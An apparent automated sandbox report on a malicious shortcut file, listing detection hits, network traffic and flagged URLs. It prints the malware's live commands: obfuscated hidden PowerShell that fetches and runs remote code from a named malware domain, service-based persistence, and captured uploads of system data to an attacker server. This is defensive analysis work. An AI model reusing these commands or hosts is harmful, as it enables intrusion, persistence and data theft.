Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Temp\myRdpService.exe cakoi10, ParentImage: C:\Windows\Temp\myRdpService.exe, ParentProcessId: 3512, ParentProcessName: myRdpService.exe, ProcessCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 8244, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4780, TargetFilename: C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1424, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 3920, ProcessName: net.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1424, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 2308, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA==" , CommandLine: powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcA

Sigma detected: SC.EXE Query Execution

Source: Process started

Author: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5072, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 1884, ProcessName: sc.exe

Sigma detected: Start Windows Service Via Net.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1424, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 3920, ProcessName: net.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline", ProcessId: 8388, ProcessName: csc.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T13:00:13.225624+0100	2803305	3	Unknown Traffic	192.168.11.30	49784	172.67.128.139	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T12:58:31.580022+0100	2803274	2	Potentially Bad Traffic	192.168.11.30	49759	172.67.128.139	443	TCP
2024-12-11T12:58:33.636026+0100	2803274	2	Potentially Bad Traffic	192.168.11.30	49761	172.67.128.139	443	TCP
2024-12-11T12:58:35.353137+0100	2803274	2	Potentially Bad Traffic	192.168.11.30	49763	172.67.128.139	443	TCP
2024-12-11T12:58:58.698786+0100	2803274	2	Potentially Bad Traffic	192.168.11.30	49777	172.67.128.139	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cocomethode.de/file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dca	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9aa29bce71057a1ce039860e7c69eeb0ef1320f1ed0c8150f1948c2ed6bd2e64238c34031fa4510c3f5cb56f2ddedd92af0607a2d92432a03063f1e11b066993a54f1321da127eb7fbaee23c8f	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/StaticFile/RdpService/79	Avira URL Cloud: Label: malware
Source: https://cocomethode.de	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd85082d15ea7c027b4749aea8867e3e247bd648d250a09153f5a9051f7fcec7ff2ad6088be998d837733babb1d81d0bf712c8881e6fc53dd0663bdd97b4ba27bb02ac3546087195d7a35ff4f222	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2eecb14e0349f34ea28f5372e	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fa	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd8	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe1550829c4b7cb0fd2ddc7	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dcadc494ef7b10813af76bf343da6dd0c11bbafd53f9d40c4534b314e17178a5f9839114b731c4ae608c27f3e23b544cc7edefd58334b3e8215446329673/Windows%20Defender/16/16/user/191	Avira URL Cloud: Label: malware
Source: http://cocomethode.de	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/Zd	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe15	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b3	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f529529d9c5cc3350ab521dfddbe2a77c01bd1692f0dae16e5e78590d23aa42283bc9f003b0925ef770ce3dbb430044380316b396c72e0dbe931d81c382	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b356ad7104732828f4fb9	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/b0cdda893b0765c99d30cddae6fd74c48ea8c4a5922a60ed3ef018a1ea2b77873615eb3	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba22e5a0273f4d6	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403f	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba22e5a0273f4d6525225d58c437ec7708	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/b0c	Avira URL Cloud: Label: malware
Source: http://cocomethode.de/api/check	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57f	Avira URL Cloud: Label: malware
Source: https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f5	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: MdmRznA6gx.lnk

ReversingLabs: Detection: 26%

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49784 version: TLS 1.2

Source:	Binary string: n.pdb source: powershell.exe, 00000008.00000002.3584448259.0000028E773E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.3584448259.0000028E773E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbV source: powershell.exe, 00000008.00000002.3586894637.0000028E77603000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rlib.pdb source: powershell.exe, 00000008.00000002.3586894637.0000028E77603000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb! source: powershell.exe, 00000008.00000002.3584448259.0000028E773E7000.00000004.00000020.00020000.00000000.sdmp

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49788

Source: global traffic

TCP traffic: 192.168.11.30:49786 -> 23.88.71.29:8000

Source: global traffic	HTTP traffic detected: GET /StaticFile/RdpService/79 HTTP/1.1Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /api/check HTTP/1.1Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: P37CVvydV0uU0RMWimDFVA==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: POST /api/registry HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: application/jsonContent-Length: 102Data Raw: 22 45 43 41 34 45 37 46 36 34 35 43 45 41 42 43 46 31 34 31 44 36 30 32 43 43 33 30 38 39 36 37 32 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "ECA4E7F645CEABCF141D602CC3089672\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Source: global traffic	HTTP traffic detected: POST /api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2 HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: multipart/form-data; boundary=---------------------8dd19b1807a0468Content-Length: 5689Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 62 31 38 30 37 61 30 34 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 54 00 65 00 72 00 6d 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 5d 00 0d 00 0a 00 22 00 44 00 65 00 70 00 65 00 6e 00 64 00 4f 00 6e 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 22 00 3d 00 68 00 65 00 78 00 28 00 37 00 29 00 3a 00 35 00 32 00 2c 00 30 00 30 00 2c 00 35 00 30 00 2c 00 30 00 30 00 2c 00 34 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 0d 00 0a 00 22 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 37 00 22 00 0d 00 0a 00 22 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 38 00 22 00 0d 00 0a 00 22 00 45 00 72 00 72 00 6f 00 72 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 22 00 3d 00 64 00 77 00 6f 00 72 00 64 00 3a 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 31 00 0d 00 0a 00 22 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 41 00 63 00 74 00 69 00 6f 00 6e 00 73 00 22 00 3d 00 68 00 65 00 78 00 3a 00 38 00 30 00 2c 00 35 00 31 00 2c 00 30 00 31 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 33 00

Source: Joe Sandbox View	IP Address: 23.88.71.29 23.88.71.29
Source: Joe Sandbox View	IP Address: 172.67.128.139 172.67.128.139

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49761 -> 172.67.128.139:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49763 -> 172.67.128.139:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49759 -> 172.67.128.139:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49777 -> 172.67.128.139:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49784 -> 172.67.128.139:443

